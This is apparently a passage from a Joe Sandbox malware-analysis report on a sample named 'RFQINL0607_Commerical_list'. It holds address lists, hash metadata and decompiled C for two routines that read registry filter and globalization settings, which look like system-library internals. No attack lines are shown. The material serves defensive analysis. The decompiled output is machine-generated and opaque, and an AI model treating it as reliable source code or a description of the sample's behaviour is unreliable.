                                                                                                                                                                                  0x333d36bb
                                                                                                                                                                                  0x333d36bd
                                                                                                                                                                                  0x333d36bf
                                                                                                                                                                                  0x333d36c0
                                                                                                                                                                                  0x333d36c2
                                                                                                                                                                                  0x333d36c7
                                                                                                                                                                                  0x333d36c7
                                                                                                                                                                                  0x333d36c7
                                                                                                                                                                                  0x333d36bd
                                                                                                                                                                                  0x333d36ce
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333d36ce
                                                                                                                                                                                  0x333d35a3
                                                                                                                                                                                  0x333d35aa
                                                                                                                                                                                  0x333d35b0
                                                                                                                                                                                  0x333d35b2
                                                                                                                                                                                  0x333d35b3
                                                                                                                                                                                  0x333d35b6
                                                                                                                                                                                  0x333d35b8
                                                                                                                                                                                  0x333d35bf
                                                                                                                                                                                  0x333d35c0
                                                                                                                                                                                  0x333d35c1
                                                                                                                                                                                  0x333d35c2
                                                                                                                                                                                  0x333d35c3
                                                                                                                                                                                  0x333d35c8
                                                                                                                                                                                  0x333d35ca
                                                                                                                                                                                  0x333d35ce
                                                                                                                                                                                  0x333d35d2
                                                                                                                                                                                  0x333d35da
                                                                                                                                                                                  0x333d35df
                                                                                                                                                                                  0x333d35e1
                                                                                                                                                                                  0x333d35e7
                                                                                                                                                                                  0x333d35ea
                                                                                                                                                                                  0x333d35ea
                                                                                                                                                                                  0x333d35fa
                                                                                                                                                                                  0x333d35fc
                                                                                                                                                                                  0x333d3608
                                                                                                                                                                                  0x333d360a
                                                                                                                                                                                  0x333d3613
                                                                                                                                                                                  0x333d3613
                                                                                                                                                                                  0x333d3616
                                                                                                                                                                                  0x333d3618
                                                                                                                                                                                  0x333d3624
                                                                                                                                                                                  0x333d3626
                                                                                                                                                                                  0x333d3628
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333d362a
                                                                                                                                                                                  0x333d362b
                                                                                                                                                                                  0x333d362e
                                                                                                                                                                                  0x333d3631
                                                                                                                                                                                  0x333d3611
                                                                                                                                                                                  0x333d3611
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333d3611
                                                                                                                                                                                  0x333d3633
                                                                                                                                                                                  0x333d363b
                                                                                                                                                                                  0x333d3641
                                                                                                                                                                                  0x333d364c
                                                                                                                                                                                  0x333d3652
                                                                                                                                                                                  0x333d3652
                                                                                                                                                                                  0x333d3654
                                                                                                                                                                                  0x333d3659
                                                                                                                                                                                  0x333d365c
                                                                                                                                                                                  0x333d3661
                                                                                                                                                                                  0x333d3667
                                                                                                                                                                                  0x333d366c
                                                                                                                                                                                  0x333d3672
                                                                                                                                                                                  0x333d3677
                                                                                                                                                                                  0x333d367d
                                                                                                                                                                                  0x333d3682
                                                                                                                                                                                  0x333d3643
                                                                                                                                                                                  0x333d3643
                                                                                                                                                                                  0x333d3643
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333d3641
                                                                                                                                                                                  0x333d368a
                                                                                                                                                                                  0x333d368c
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333d368e
                                                                                                                                                                                  0x333d368e
                                                                                                                                                                                  0x333d368e
                                                                                                                                                                                  0x333d3691
                                                                                                                                                                                  0x333d3694
                                                                                                                                                                                  0x333d3694
                                                                                                                                                                                  0x333d3694
                                                                                                                                                                                  0x333d35fe
                                                                                                                                                                                  0x333d35fe
                                                                                                                                                                                  0x333d35fe
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333d35fc
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333d33cb
                                                                                                                                                                                  0x333d33cb
                                                                                                                                                                                  0x333d33cb
                                                                                                                                                                                  0x333d33d5
                                                                                                                                                                                  0x333d33d8
                                                                                                                                                                                  0x333d33da
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333d33e0
                                                                                                                                                                                  0x333d33f5
                                                                                                                                                                                  0x333d33f7
                                                                                                                                                                                  0x333d33f9
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333d3403
                                                                                                                                                                                  0x333d3405
                                                                                                                                                                                  0x333d3406
                                                                                                                                                                                  0x333d3407
                                                                                                                                                                                  0x333d3408
                                                                                                                                                                                  0x333d340e
                                                                                                                                                                                  0x333d340f
                                                                                                                                                                                  0x333d3418
                                                                                                                                                                                  0x333d341a
                                                                                                                                                                                  0x333d341c
                                                                                                                                                                                  0x333d338d
                                                                                                                                                                                  0x333d338d
                                                                                                                                                                                  0x333d3390
                                                                                                                                                                                  0x333d3393
                                                                                                                                                                                  0x333d3462
                                                                                                                                                                                  0x333d3462
                                                                                                                                                                                  0x333d3465
                                                                                                                                                                                  0x333d33b5
                                                                                                                                                                                  0x333d33b5
                                                                                                                                                                                  0x333d3485
                                                                                                                                                                                  0x333d3485
                                                                                                                                                                                  0x333d3487
                                                                                                                                                                                  0x333d3495
                                                                                                                                                                                  0x333d3495
                                                                                                                                                                                  0x333d349a
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333d349a
                                                                                                                                                                                  0x333d346e
                                                                                                                                                                                  0x333d3472
                                                                                                                                                                                  0x333d3479
                                                                                                                                                                                  0x333d3480
                                                                                                                                                                                  0x333d3480
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333d3480
                                                                                                                                                                                  0x333d347b
                                                                                                                                                                                  0x333d344c
                                                                                                                                                                                  0x333d344c
                                                                                                                                                                                  0x333d3457
                                                                                                                                                                                  0x333d3458
                                                                                                                                                                                  0x333d345d
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333d345d
                                                                                                                                                                                  0x333d3399
                                                                                                                                                                                  0x333d339c
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333d33a2
                                                                                                                                                                                  0x333d33a5
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333d33a7
                                                                                                                                                                                  0x333d33aa
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333d33ac
                                                                                                                                                                                  0x333d33af
                                                                                                                                                                                  0x333d343d
                                                                                                                                                                                  0x333d3440
                                                                                                                                                                                  0x333d3444
                                                                                                                                                                                  0x333d3449
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333d344b
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333d344b
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333d33af
                                                                                                                                                                                  0x333d3422
                                                                                                                                                                                  0x333d3428
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333d3436
                                                                                                                                                                                  0x333d3436
                                                                                                                                                                                  0x333d36d2
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333d36d2
                                                                                                                                                                                  0x333d338b
                                                                                                                                                                                  0x333d338b
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333d333a
                                                                                                                                                                                  0x333d333a
                                                                                                                                                                                  0x333d36d7
                                                                                                                                                                                  0x333d36de
                                                                                                                                                                                  0x333d36df
                                                                                                                                                                                  0x333d36e0
                                                                                                                                                                                  0x333d36eb
                                                                                                                                                                                  0x333d36eb

                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000002.00000002.11643698870.0000000033320000.00000040.00001000.00020000.00000000.sdmp, Offset: 33320000, based on PE: true
                                                                                                                                                                                  • Associated: 00000002.00000002.11643698870.0000000033449000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.11643698870.000000003344D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_33320000_RFQINL0607_Commerical_list.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID: @$DelegatedNtdll$\SystemRoot\system32\
                                                                                                                                                                                  • API String ID: 0-2391371766
                                                                                                                                                                                  • Opcode ID: cd2ca2acd9e4ce24552c1929f5136fb4f8071702eaee80d48759aed9df37723d
                                                                                                                                                                                  • Instruction ID: bffc0bcf626310c428bae0f0c307a4f62928800fda86b6e858a74d7627b2b7cf
                                                                                                                                                                                  • Opcode Fuzzy Hash: cd2ca2acd9e4ce24552c1929f5136fb4f8071702eaee80d48759aed9df37723d
                                                                                                                                                                                  • Instruction Fuzzy Hash: 27B1AFB2A49305AFE351DF50CCC0B5BB7E8EB44764F448929FA50EB650CB74EC448B92
                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                  Function 3334A147 Relevance: 4.0, Strings: 3, Instructions: 238COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  C-Code - Quality: 72%
                                                                                                                                                                                  			E3334A147(signed int* __ecx, char* __edx, signed int _a4) {
				signed int _v12;
				intOrPtr _v548;
				intOrPtr _v552;
				intOrPtr _v556;
				char _v560;
				signed int _v564;
				intOrPtr _v568;
				char _v572;
				intOrPtr _v576;
				short _v578;
				char _v580;
				signed int _v584;
				intOrPtr _v586;
				char _v588;
				char* _v592;
				intOrPtr _v596;
				intOrPtr _v600;
				char* _v604;
				signed int* _v608;
				intOrPtr _v612;
				short _v614;
				char _v616;
				signed int _v620;
				signed int _v624;
				intOrPtr _v628;
				char* _v632;
				signed int _v636;
				char _v640;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t94;
				char _t96;
				char* _t101;
				intOrPtr _t120;
				void* _t121;
				intOrPtr _t125;
				short _t129;
				signed int* _t140;
				intOrPtr _t141;
				intOrPtr _t146;
				intOrPtr _t148;
				intOrPtr _t151;
				signed int _t153;
				signed int _t154;
				void* _t155;
				signed int _t157;

				_t152 = __edx;
				_v12 =  *0x3344b370 ^ _t157;
				_v564 = _v564 & 0x00000000;
				_t154 = _a4;
				_t140 = __ecx;
				_v604 = __edx;
				_v608 = __ecx;
				_t153 = 0;
				_v568 = 0x220;
				_v592 =  &_v560;
				if(E33371D10( &_v580, L"UseFilter") < 0) {
					L4:
					return E33394B50(_t90, _t140, _v12 ^ _t157, _t152, _t153, _t154);
				}
				_push( &_v572);
				_push(0x220);
				_push( &_v560);
				_t94 = 2;
				_push(_t94);
				_push( &_v580);
				_push( *_t140);
				_t90 = E33392B00();
				if(_t90 >= 0) {
					if(_v556 != 4 || _v552 != 4 || _v548 == 0) {
						L3:
						_t90 = 0;
					} else {
						_t96 =  *_t154;
						_t154 =  *(_t154 + 4);
						_v588 = _t96;
						_v584 = _t154;
						if(E33371D10( &_v580, L"\\??\\") < 0) {
							goto L4;
						}
						if(E333840F0( &_v560,  &_v580,  &_v588, ?str?) != 0) {
							_v588 = _v588 + 0xfff8;
							_v586 = _v586 + 0xfff8;
							_v584 = _t154 + 8;
						}
						_t101 =  &_v560;
						_t146 = 0;
						_v596 = _t101;
						_v600 = 0;
						do {
							_t152 =  &_v572;
							_push( &_v572);
							_push(_v568);
							_push(_t101);
							_push(0);
							_push(_t146);
							_push( *_t140);
							_t154 = L33392CD0();
							if(_t154 < 0) {
								goto L37;
							}
							_t148 = _v596;
							_v580 =  *((intOrPtr*)(_t148 + 0xc));
							_v624 = _v624 & 0x00000000;
							_v620 = _v620 & 0x00000000;
							_v578 =  *((intOrPtr*)(_t148 + 0xc));
							_v576 = _t148 + 0x10;
							_v636 =  *_t140;
							_v632 =  &_v580;
							_push( &_v640);
							_push(_v604);
							_v640 = 0x18;
							_push( &_v564);
							_v628 = 0x240;
							_t154 = E33392AB0();
							if(_t154 < 0) {
								goto L37;
							}
							_t154 = E33371D10( &_v580, L"FilterFullPath");
							if(_t154 < 0) {
								L36:
								_push(_v564);
								E33392A80();
								goto L37;
							}
							_t141 = _v592;
							_t120 = _v568;
							do {
								_push( &_v572);
								_push(_t120);
								_push(_t141);
								_t121 = 2;
								_push(_t121);
								_push( &_v580);
								_push(_v564);
								_t155 = E33392B00();
								if(_t155 == 0x80000005 || _t155 == 0xc0000023) {
									if(_t153 != 0) {
										E33363BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t153);
									}
									_t150 =  *((intOrPtr*)( *[fs:0x30] + 0x18));
									if( *((intOrPtr*)( *[fs:0x30] + 0x18)) != 0) {
										_t125 =  *0x33445d78; // 0x0
										_t153 = L33365D90(_t150, _t150, _t125 + 0x180000, _v572);
										if(_t153 == 0) {
											goto L25;
										}
										_t120 = _v572;
										_t141 = _t153;
										_v596 = _t153;
										_v568 = _t120;
										goto L27;
									} else {
										_t153 = 0;
										L25:
										_t154 = 0xc0000017;
										goto L26;
									}
								} else {
									L26:
									_t120 = _v568;
								}
								L27:
							} while (_t154 == 0x80000005 || _t154 == 0xc0000023);
							_v592 = _t141;
							_t140 = _v608;
							if(_t154 >= 0) {
								_t151 = _v592;
								if( *((intOrPtr*)(_t151 + 4)) == 1 &&  *((intOrPtr*)(_t151 + 8)) <= 0xfffe) {
									_t152 = 2;
									_t129 =  *((intOrPtr*)(_t151 + 8)) - _t152;
									_v616 = _t129;
									_v614 = _t129;
									_v612 = _t151 + 0xc;
									if(E333704C0( &_v588,  &_v616, ?str?) == 0) {
										break;
									}
								}
								goto L36;
							}
							_push(_v564);
							E33392A80();
							_t65 = _t154 + 0x3fffffcc; // 0x3fffffcc
							asm("sbb eax, eax");
							_t154 = _t154 &  ~_t65;
							L37:
							_t101 = _v596;
							_t146 = _v600 + 1;
							_v600 = _t146;
						} while (_t154 >= 0);
						if(_t153 != 0) {
							E33363BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t153);
						}
						if(_t154 >= 0) {
							_push( *_t140);
							E33392A80();
							 *_t140 = _v564;
						}
						_t86 = _t154 + 0x7fffffe6; // 0x7fffffe6
						asm("sbb eax, eax");
						_t90 =  ~_t86 & _t154;
					}
					goto L4;
				}
				if(_t90 != 0xc0000034) {
					if(_t90 == 0xc0000023) {
						goto L3;
					}
					if(_t90 != 0x80000005) {
						goto L4;
					}
				}
				goto L3;
			}


















































                                                                                                                                                                                  0x3334a147
                                                                                                                                                                                  0x3334a159
                                                                                                                                                                                  0x3334a15c
                                                                                                                                                                                  0x3334a16b
                                                                                                                                                                                  0x3334a16e
                                                                                                                                                                                  0x3334a17c
                                                                                                                                                                                  0x3334a183
                                                                                                                                                                                  0x3334a189
                                                                                                                                                                                  0x3334a18b
                                                                                                                                                                                  0x3334a195
                                                                                                                                                                                  0x3334a1a2
                                                                                                                                                                                  0x3334a1de
                                                                                                                                                                                  0x3334a1ec
                                                                                                                                                                                  0x3334a1ec
                                                                                                                                                                                  0x3334a1aa
                                                                                                                                                                                  0x3334a1ab
                                                                                                                                                                                  0x3334a1b6
                                                                                                                                                                                  0x3334a1b9
                                                                                                                                                                                  0x3334a1ba
                                                                                                                                                                                  0x3334a1c1
                                                                                                                                                                                  0x3334a1c2
                                                                                                                                                                                  0x3334a1c4
                                                                                                                                                                                  0x3334a1cb
                                                                                                                                                                                  0x333abf43
                                                                                                                                                                                  0x3334a1dc
                                                                                                                                                                                  0x3334a1dc
                                                                                                                                                                                  0x333abf62
                                                                                                                                                                                  0x333abf62
                                                                                                                                                                                  0x333abf64
                                                                                                                                                                                  0x333abf67
                                                                                                                                                                                  0x333abf79
                                                                                                                                                                                  0x333abf86
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333abfa3
                                                                                                                                                                                  0x333abfaa
                                                                                                                                                                                  0x333abfb1
                                                                                                                                                                                  0x333abfbb
                                                                                                                                                                                  0x333abfbb
                                                                                                                                                                                  0x333abfc1
                                                                                                                                                                                  0x333abfc7
                                                                                                                                                                                  0x333abfc9
                                                                                                                                                                                  0x333abfcf
                                                                                                                                                                                  0x333abfd5
                                                                                                                                                                                  0x333abfd5
                                                                                                                                                                                  0x333abfdb
                                                                                                                                                                                  0x333abfdc
                                                                                                                                                                                  0x333abfe2
                                                                                                                                                                                  0x333abfe3
                                                                                                                                                                                  0x333abfe5
                                                                                                                                                                                  0x333abfe6
                                                                                                                                                                                  0x333abfed
                                                                                                                                                                                  0x333abff1
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333abff7
                                                                                                                                                                                  0x333ac001
                                                                                                                                                                                  0x333ac00c
                                                                                                                                                                                  0x333ac013
                                                                                                                                                                                  0x333ac01a
                                                                                                                                                                                  0x333ac024
                                                                                                                                                                                  0x333ac02c
                                                                                                                                                                                  0x333ac038
                                                                                                                                                                                  0x333ac044
                                                                                                                                                                                  0x333ac045
                                                                                                                                                                                  0x333ac051
                                                                                                                                                                                  0x333ac05b
                                                                                                                                                                                  0x333ac05c
                                                                                                                                                                                  0x333ac06b
                                                                                                                                                                                  0x333ac06f
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333ac086
                                                                                                                                                                                  0x333ac08a
                                                                                                                                                                                  0x333ac1ba
                                                                                                                                                                                  0x333ac1ba
                                                                                                                                                                                  0x333ac1c0
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333ac1c0
                                                                                                                                                                                  0x333ac090
                                                                                                                                                                                  0x333ac096
                                                                                                                                                                                  0x333ac09c
                                                                                                                                                                                  0x333ac0a2
                                                                                                                                                                                  0x333ac0a3
                                                                                                                                                                                  0x333ac0a4
                                                                                                                                                                                  0x333ac0a7
                                                                                                                                                                                  0x333ac0a8
                                                                                                                                                                                  0x333ac0af
                                                                                                                                                                                  0x333ac0b0
                                                                                                                                                                                  0x333ac0bb
                                                                                                                                                                                  0x333ac0c3
                                                                                                                                                                                  0x333ac0cf
                                                                                                                                                                                  0x333ac0dd
                                                                                                                                                                                  0x333ac0dd
                                                                                                                                                                                  0x333ac0e8
                                                                                                                                                                                  0x333ac0ed
                                                                                                                                                                                  0x333ac138
                                                                                                                                                                                  0x333ac14f
                                                                                                                                                                                  0x333ac153
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333ac155
                                                                                                                                                                                  0x333ac15b
                                                                                                                                                                                  0x333ac15d
                                                                                                                                                                                  0x333ac163
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333ac0ef
                                                                                                                                                                                  0x333ac0ef
                                                                                                                                                                                  0x333ac0f1
                                                                                                                                                                                  0x333ac0f1
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333ac0f1
                                                                                                                                                                                  0x333ac0f6
                                                                                                                                                                                  0x333ac0f6
                                                                                                                                                                                  0x333ac0f6
                                                                                                                                                                                  0x333ac0f6
                                                                                                                                                                                  0x333ac0fc
                                                                                                                                                                                  0x333ac0fc
                                                                                                                                                                                  0x333ac10c
                                                                                                                                                                                  0x333ac112
                                                                                                                                                                                  0x333ac11a
                                                                                                                                                                                  0x333ac16b
                                                                                                                                                                                  0x333ac175
                                                                                                                                                                                  0x333ac186
                                                                                                                                                                                  0x333ac187
                                                                                                                                                                                  0x333ac18a
                                                                                                                                                                                  0x333ac191
                                                                                                                                                                                  0x333ac19b
                                                                                                                                                                                  0x333ac1b8
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333ac1b8
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333ac175
                                                                                                                                                                                  0x333ac11c
                                                                                                                                                                                  0x333ac122
                                                                                                                                                                                  0x333ac127
                                                                                                                                                                                  0x333ac12f
                                                                                                                                                                                  0x333ac131
                                                                                                                                                                                  0x333ac1c5
                                                                                                                                                                                  0x333ac1cb
                                                                                                                                                                                  0x333ac1d1
                                                                                                                                                                                  0x333ac1d2
                                                                                                                                                                                  0x333ac1d8
                                                                                                                                                                                  0x333ac1e2
                                                                                                                                                                                  0x333ac1f0
                                                                                                                                                                                  0x333ac1f0
                                                                                                                                                                                  0x333ac1f7
                                                                                                                                                                                  0x333ac1f9
                                                                                                                                                                                  0x333ac1fb
                                                                                                                                                                                  0x333ac206
                                                                                                                                                                                  0x333ac206
                                                                                                                                                                                  0x333ac208
                                                                                                                                                                                  0x333ac210
                                                                                                                                                                                  0x333ac212
                                                                                                                                                                                  0x333ac212
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333abf43
                                                                                                                                                                                  0x3334a1d6
                                                                                                                                                                                  0x333abf26
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333abf31
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333abf37
                                                                                                                                                                                  0x00000000

                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000002.00000002.11643698870.0000000033320000.00000040.00001000.00020000.00000000.sdmp, Offset: 33320000, based on PE: true
                                                                                                                                                                                  • Associated: 00000002.00000002.11643698870.0000000033449000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.11643698870.000000003344D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_33320000_RFQINL0607_Commerical_list.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID: FilterFullPath$UseFilter$\??\
                                                                                                                                                                                  • API String ID: 0-2779062949
                                                                                                                                                                                  • Opcode ID: de65fa6345e2f6aaf92d0aec3b2f64d6ca140726c67aa2fdffa363812fbf80cf
                                                                                                                                                                                  • Instruction ID: 1e0e6fd5428ff9c73da4aa6d917d8594ce9aaef2f76dbe8574eb6a5bccabe3c2
                                                                                                                                                                                  • Opcode Fuzzy Hash: de65fa6345e2f6aaf92d0aec3b2f64d6ca140726c67aa2fdffa363812fbf80cf
                                                                                                                                                                                  • Instruction Fuzzy Hash: CDA16B76D416299BDB21DF68CC88BDAB7B8EF04714F1481EAE908E7250DB359E84CF50
                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                  Function 3342B2BC Relevance: 3.9, Strings: 3, Instructions: 180COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  C-Code - Quality: 60%
                                                                                                                                                                                  			E3342B2BC(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, signed int* _a8) {
				signed int _v8;
				char _v532;
				signed int* _v536;
				signed int _v540;
				intOrPtr _v544;
				signed int _v546;
				signed int _v548;
				signed int _v552;
				intOrPtr _v556;
				intOrPtr _v560;
				char _v564;
				char _v572;
				intOrPtr _v576;
				intOrPtr _v580;
				intOrPtr _v584;
				signed int* _v588;
				intOrPtr _v592;
				char _v596;
				char _v600;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t66;
				void* _t70;
				void* _t73;
				void* _t82;
				void* _t86;
				void* _t89;
				intOrPtr* _t101;
				intOrPtr _t112;
				signed int _t114;
				signed int _t115;

				_t111 = __edx;
				_v8 =  *0x3344b370 ^ _t115;
				_v556 = _a4;
				_t112 = 0;
				_v540 = _v540 & 0;
				_v536 = _a8;
				_v560 = __ecx;
				_t101 = L33365D90(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0x4c);
				if(_t101 == 0) {
					_t113 = 0xc0000017;
					L4:
					if(_t113 < 0) {
						L25:
						if(_t101 != 0) {
							E33363BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t101);
						}
						return E33394B50(_t113, _t101, _v8 ^ _t115, _t111, _t112, _t113);
					} else {
						_t66 =  *((intOrPtr*)(_t112 + 1));
						if(_t66 < 2 || _t66 == 5 &&  *((intOrPtr*)(_t112 + 8)) == 0x15 &&  *((intOrPtr*)(_t112 + 0x18)) == 0x1f7) {
							_t113 = 0xc0000136;
							_v540 = 1;
							 *_v536 =  *_v536 & 0x00000000;
						}
						_t124 = _t113;
						if(_t113 >= 0) {
							_t70 = E333739C0(_t101, _t113, _t124,  &_v572, _t112, "true");
							_t113 = _t70;
							if(_t70 >= 0) {
								_v552 = _v552 & 0x00000000;
								_t73 = E33385BE0(L"GlobalizationUserSettings", L"TargetNtPath", L"\\Registry\\Machine\\SYSTEM\\CurrentControlSet\\Control\\International", 0,  &_v532, 0x208,  &_v552);
								_t113 = _t73;
								if(_t73 >= 0) {
									_t107 = _v552 + 4;
									_t114 = _v572 + _v552 + 0x00000004 & 0x0000ffff;
									_t112 = L33365D90(_v552 + 4,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t114);
									if(_t112 == 0) {
										_t113 = 0xc0000017;
									} else {
										_v548 = _v548 & 0x00000000;
										_v546 = _t114;
										_v544 = _t112;
										_t82 = E3335FE40(_t107,  &_v548,  &_v532);
										_t113 = _t82;
										if(_t82 >= 0) {
											_t86 = E3335FE40(_t107,  &_v548, "\\");
											_t113 = _t86;
											if(_t86 >= 0) {
												_t89 = E333710D0(_t107,  &_v548,  &_v572);
												_t113 = _t89;
												if(_t89 >= 0) {
													_v596 = 0x18;
													_v588 =  &_v548;
													_v592 = 0;
													_push( &_v596);
													_push(0x20019);
													_v584 = 0x240;
													_push( &_v564);
													_v580 = 0;
													_v576 = 0;
													if( *0x3332733c() < 0) {
														__eflags = 1;
														_v540 = 1;
														 *_v536 = 1;
													} else {
														 *0x33327340(_v564);
														 *_v536 = 2;
														_t113 =  *0x3332733c(_v556, _v560,  &_v596);
													}
												}
											}
										}
										E33363BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t112);
									}
								}
								E33363B90( &_v572);
							}
						}
						if(_v540 != 0) {
							_t111 = _v556;
							_t113 = E3342B55F(_v560, _v556);
						}
						goto L25;
					}
				}
				_t113 =  *0x33327348(0xfffffffa, "true", _t101, 0x4c,  &_v600);
				if(_t113 < 0) {
					goto L25;
				} else {
					_t112 =  *_t101;
					goto L4;
				}
			}



































                                                                                                                                                                                  0x3342b2bc
                                                                                                                                                                                  0x3342b2ce
                                                                                                                                                                                  0x3342b2d7
                                                                                                                                                                                  0x3342b2dd
                                                                                                                                                                                  0x3342b2e2
                                                                                                                                                                                  0x3342b2e8
                                                                                                                                                                                  0x3342b2f8
                                                                                                                                                                                  0x3342b306
                                                                                                                                                                                  0x3342b30a
                                                                                                                                                                                  0x3342b32e
                                                                                                                                                                                  0x3342b333
                                                                                                                                                                                  0x3342b335
                                                                                                                                                                                  0x3342b537
                                                                                                                                                                                  0x3342b539
                                                                                                                                                                                  0x3342b547
                                                                                                                                                                                  0x3342b547
                                                                                                                                                                                  0x3342b55c
                                                                                                                                                                                  0x3342b33b
                                                                                                                                                                                  0x3342b33b
                                                                                                                                                                                  0x3342b340
                                                                                                                                                                                  0x3342b35b
                                                                                                                                                                                  0x3342b360
                                                                                                                                                                                  0x3342b36a
                                                                                                                                                                                  0x3342b36a
                                                                                                                                                                                  0x3342b36d
                                                                                                                                                                                  0x3342b36f
                                                                                                                                                                                  0x3342b37f
                                                                                                                                                                                  0x3342b384
                                                                                                                                                                                  0x3342b388
                                                                                                                                                                                  0x3342b38e
                                                                                                                                                                                  0x3342b3b9
                                                                                                                                                                                  0x3342b3be
                                                                                                                                                                                  0x3342b3c2
                                                                                                                                                                                  0x3342b3d4
                                                                                                                                                                                  0x3342b3d9
                                                                                                                                                                                  0x3342b3ed
                                                                                                                                                                                  0x3342b3f1
                                                                                                                                                                                  0x3342b50a
                                                                                                                                                                                  0x3342b3f7
                                                                                                                                                                                  0x3342b3f7
                                                                                                                                                                                  0x3342b40b
                                                                                                                                                                                  0x3342b413
                                                                                                                                                                                  0x3342b419
                                                                                                                                                                                  0x3342b41e
                                                                                                                                                                                  0x3342b422
                                                                                                                                                                                  0x3342b434
                                                                                                                                                                                  0x3342b439
                                                                                                                                                                                  0x3342b43d
                                                                                                                                                                                  0x3342b451
                                                                                                                                                                                  0x3342b456
                                                                                                                                                                                  0x3342b45a
                                                                                                                                                                                  0x3342b466
                                                                                                                                                                                  0x3342b470
                                                                                                                                                                                  0x3342b47e
                                                                                                                                                                                  0x3342b484
                                                                                                                                                                                  0x3342b485
                                                                                                                                                                                  0x3342b490
                                                                                                                                                                                  0x3342b49a
                                                                                                                                                                                  0x3342b49b
                                                                                                                                                                                  0x3342b4a1
                                                                                                                                                                                  0x3342b4af
                                                                                                                                                                                  0x3342b4ee
                                                                                                                                                                                  0x3342b4ef
                                                                                                                                                                                  0x3342b4f5
                                                                                                                                                                                  0x3342b4b1
                                                                                                                                                                                  0x3342b4b7
                                                                                                                                                                                  0x3342b4c3
                                                                                                                                                                                  0x3342b4e2
                                                                                                                                                                                  0x3342b4e2
                                                                                                                                                                                  0x3342b4af
                                                                                                                                                                                  0x3342b45a
                                                                                                                                                                                  0x3342b43d
                                                                                                                                                                                  0x3342b503
                                                                                                                                                                                  0x3342b503
                                                                                                                                                                                  0x3342b3f1
                                                                                                                                                                                  0x3342b516
                                                                                                                                                                                  0x3342b516
                                                                                                                                                                                  0x3342b388
                                                                                                                                                                                  0x3342b522
                                                                                                                                                                                  0x3342b524
                                                                                                                                                                                  0x3342b535
                                                                                                                                                                                  0x3342b535
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x3342b522
                                                                                                                                                                                  0x3342b335
                                                                                                                                                                                  0x3342b320
                                                                                                                                                                                  0x3342b324
